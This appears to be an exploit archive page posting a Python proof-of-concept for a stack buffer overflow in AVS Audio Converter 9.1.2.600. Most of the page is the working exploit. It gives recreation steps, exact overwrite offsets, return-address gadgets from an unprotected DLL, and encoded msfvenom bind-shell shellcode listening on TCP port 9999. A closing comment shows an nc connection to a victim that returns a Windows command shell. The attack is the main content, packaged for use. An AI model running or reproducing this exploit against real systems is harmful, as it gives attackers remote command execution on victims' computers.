exploit the possibilities

AVS Audio Converter 9.1.2.600 Stack Overflow

AVS Audio Converter 9.1.2.600 Stack Overflow
Posted Dec 28, 2019
Authored by boku

AVS Audio Converter version 9.1.2.600 stack overflow proof of concept exploit.

tags | exploit, overflow, proof of concept
MD5 | 46c6cde0d6cf6092eb46863d4eda74b6

AVS Audio Converter 9.1.2.600 Stack Overflow

Change Mirror Download
# Exploit Title: AVS Audio Converter 9.1.2.600 - Stack Overflow (PoC)
# Date: December 2019-12-28
# Exploit Author: boku
# Original DoS: https://www.exploit-db.com/exploits/47788
# Original DoS Author: ZwX
# Software Vendor: http://www.avs4you.com/
# Software Link: http://www.avs4you.com/avs-audio-converter.aspx
# Version: 9.1.2.600
# Tested on: Microsoft Windows 10 Home 1909(x86-64) - 10.0.18363 N/A Build 18363
# Microsoft Windows 7 Enterprise(x86-64) - 6.1.7601 Service Pack 1 Build 7601

#!/usr/bin/python
# Recreate:
# 1) Generate the 'bind9999.txt' payload using python 2.7.x on Kali Linux.
# 2) On the victim Windows machine, open the file 'bind9999.txt' with notepad, then Select-All > Copy.
# 3) Install & Open AVS Audio Converter 9.1.2.600.
# 4) Locate the textbox to the right of 'Output Folder:'; at the bottom of the main window.
# 5) Paste the copied payload from the 'bind9999.txt' file into the textbox.
# 6) Click the 'Browse...' button; to the right of the textbox.
# - The program will freeze & a bind shell will be listening on tcp port 9999; on all interfaces.
# Special thanks to: The Offsec Team, Corelan Team, Vivek/Pentester Academy Team, Skape
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet
File = 'bind9999.txt'
try:
# 0x00400000 [AVSAudioConverter.exe]
# 9.1.2.600 (C:\Program Files (x86)\AVS4YOU\AVSAudioConverter\AVSAudioConverter.exe)
# - The only module that has SafeSEH disabled.
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x00400000 | 0x00f33000 | False | False | False | False | False |
# - Attempting a 3-byte SEH-handler overwrite will fail due to no exception being thrown.
offEdx = '\x41'*260
edx = '\x42\x42\x42\x42' # EDX overwrite at 260 bytes. EDX=0x42424242
# SEH-Record overwrite at offset 264; the goal from here is to not throw an exception or we're screwed.
nSEH = '\x42'*4
SEH = '\x43'*4
# - If address at offset 308 is not readable, then the program will throw an exception at:
# 75F9ECE7 3806 cmp byte ptr ds:[esi], al
# [!] Access violation when reading [esi]
# - If we can get past this exception, we can overwrite EIP at offset 304.
# - [esi] must be successfully overwriten so we can put our payload after it.
offEip = '\x45'*32
# - AVSAudioEditor5.dll is the only other module with both ASLR & Rebase disabled.
# - The enabled SafeSEH blocks us from using it for a SEH overwrite, but we can still jump
# to it with a vanilla EIP overwrite; due to overwriting a return address on the stack.
# - After bypassing the ESI read exception, our stack will look like this after the EIP overwrite:
# ECX=0018FA60 ESP=0018FA60 (Stack locations will vary)
# 0018FA54 45454545 EEEE // [296]
# 0018FA58 45454545 EEEE // [300]
# 0018FA5C 1006563E V... // [304] eip var # Pointer to 'pop+ret'
# *0018FA60 00000000 .... // [308] esi var # our esi address gets replaced by 4 nulls
# 0018FA64 1006A438 8... // [312] jmpEsp var # Pointer to 'jmp esp'
# 0018FA68 E510EC10 .... // [316] fixStack var # ASM to fix the Stack so shellcode will work
# [AVSAudioEditor5.dll] (C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSAudioEditor5.dll)
# Base | Top | Rebase | SafeSEH | ASLR | NXCompat | OS Dll |
# 0x10000000 | 0x100a1000 | False | True | False | False | False |
# 0x1006563e : pop esi # ret | ascii {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
eip = '\x3e\x56\x06\x10' # pop+ret
# - After pop+ret, ESP=0018FA68
esi = '\x10\x10\x08\x10' # [AVSAudioEditor5.dll] | .data | RW
# 0x1006a438 : jmp esp | {PAGE_EXECUTE_READ} [AVSAudioEditor5.dll]
# - the esi var address is just a random, readable memory location that will not move; to bypass the exception.
jmpEsp = '\x38\xa4\x06\x10' # jmp esp pointer
# EBP is 45454545 at this point. Needs to be fixed for most shellcode payloads to work properly.
fixStack = '\x83\xEC\x10' # sub esp, 0x10
fixStack += '\x89\xE5' # mov ebp, esp
fixStack += '\x83\xEC\x60' # sub esp, 0x60
#msfvenom -p windows/shell_bind_tcp LPORT=9999 -v shellcode -a x86 --platform windows -b '\x00' --format python
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
shellcode = b""
shellcode += b"\xbe\xd8\x49\x8d\x72\xd9\xe5\xd9\x74\x24\xf4"
shellcode += b"\x5a\x31\xc9\xb1\x53\x31\x72\x12\x83\xea\xfc"
shellcode += b"\x03\xaa\x47\x6f\x87\xb6\xb0\xed\x68\x46\x41"
shellcode += b"\x92\xe1\xa3\x70\x92\x96\xa0\x23\x22\xdc\xe4"
shellcode += b"\xcf\xc9\xb0\x1c\x5b\xbf\x1c\x13\xec\x0a\x7b"
shellcode += b"\x1a\xed\x27\xbf\x3d\x6d\x3a\xec\x9d\x4c\xf5"
shellcode += b"\xe1\xdc\x89\xe8\x08\x8c\x42\x66\xbe\x20\xe6"
shellcode += b"\x32\x03\xcb\xb4\xd3\x03\x28\x0c\xd5\x22\xff"
shellcode += b"\x06\x8c\xe4\xfe\xcb\xa4\xac\x18\x0f\x80\x67"
shellcode += b"\x93\xfb\x7e\x76\x75\x32\x7e\xd5\xb8\xfa\x8d"
shellcode += b"\x27\xfd\x3d\x6e\x52\xf7\x3d\x13\x65\xcc\x3c"
shellcode += b"\xcf\xe0\xd6\xe7\x84\x53\x32\x19\x48\x05\xb1"
shellcode += b"\x15\x25\x41\x9d\x39\xb8\x86\x96\x46\x31\x29"
shellcode += b"\x78\xcf\x01\x0e\x5c\x8b\xd2\x2f\xc5\x71\xb4"
shellcode += b"\x50\x15\xda\x69\xf5\x5e\xf7\x7e\x84\x3d\x90"
shellcode += b"\xb3\xa5\xbd\x60\xdc\xbe\xce\x52\x43\x15\x58"
shellcode += b"\xdf\x0c\xb3\x9f\x20\x27\x03\x0f\xdf\xc8\x74"
shellcode += b"\x06\x24\x9c\x24\x30\x8d\x9d\xae\xc0\x32\x48"
shellcode += b"\x5a\xc8\x95\x23\x79\x35\x65\x94\x3d\x95\x0e"
shellcode += b"\xfe\xb1\xca\x2f\x01\x18\x63\xc7\xfc\xa3\xac"
shellcode += b"\x17\x88\x42\xd8\x37\xdc\xdd\x74\xfa\x3b\xd6"
shellcode += b"\xe3\x05\x6e\x4e\x83\x4e\x78\x49\xac\x4e\xae"
shellcode += b"\xfd\x3a\xc5\xbd\x39\x5b\xda\xeb\x69\x0c\x4d"
shellcode += b"\x61\xf8\x7f\xef\x76\xd1\x17\x8c\xe5\xbe\xe7"
shellcode += b"\xdb\x15\x69\xb0\x8c\xe8\x60\x54\x21\x52\xdb"
shellcode += b"\x4a\xb8\x02\x24\xce\x67\xf7\xab\xcf\xea\x43"
shellcode += b"\x88\xdf\x32\x4b\x94\x8b\xea\x1a\x42\x65\x4d"
shellcode += b"\xf5\x24\xdf\x07\xaa\xee\xb7\xde\x80\x30\xc1"
shellcode += b"\xde\xcc\xc6\x2d\x6e\xb9\x9e\x52\x5f\x2d\x17"
shellcode += b"\x2b\xbd\xcd\xd8\xe6\x05\xfd\x92\xaa\x2c\x96"
shellcode += b"\x7a\x3f\x6d\xfb\x7c\xea\xb2\x02\xff\x1e\x4b"
shellcode += b"\xf1\x1f\x6b\x4e\xbd\xa7\x80\x22\xae\x4d\xa6"
shellcode += b"\x91\xcf\x47"
payload = offEdx+edx+nSEH+SEH+offEip+eip+esi+jmpEsp+fixStack+shellcode
# offsets: 0 260 264 268 272 304 308 312 316 324
f = open(File, 'w') # open file for write
f.write(payload)
f.close() # close the file
print blt + File + " created successfully "
# root@kali# nc <Victim IP> 9999
# Microsoft Windows [Version 6.1.7601]
# C:\Program Files (x86)\AVS4YOU\AVSAudioConverter>
except:
print err + File + ' failed to create'

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    1 Files
  • 2
    Feb 2nd
    2 Files
  • 3
    Feb 3rd
    17 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    16 Files
  • 7
    Feb 7th
    19 Files
  • 8
    Feb 8th
    2 Files
  • 9
    Feb 9th
    2 Files
  • 10
    Feb 10th
    15 Files
  • 11
    Feb 11th
    20 Files
  • 12
    Feb 12th
    16 Files
  • 13
    Feb 13th
    19 Files
  • 14
    Feb 14th
    17 Files
  • 15
    Feb 15th
    4 Files
  • 16
    Feb 16th
    4 Files
  • 17
    Feb 17th
    34 Files
  • 18
    Feb 18th
    15 Files
  • 19
    Feb 19th
    20 Files
  • 20
    Feb 20th
    33 Files
  • 21
    Feb 21st
    11 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close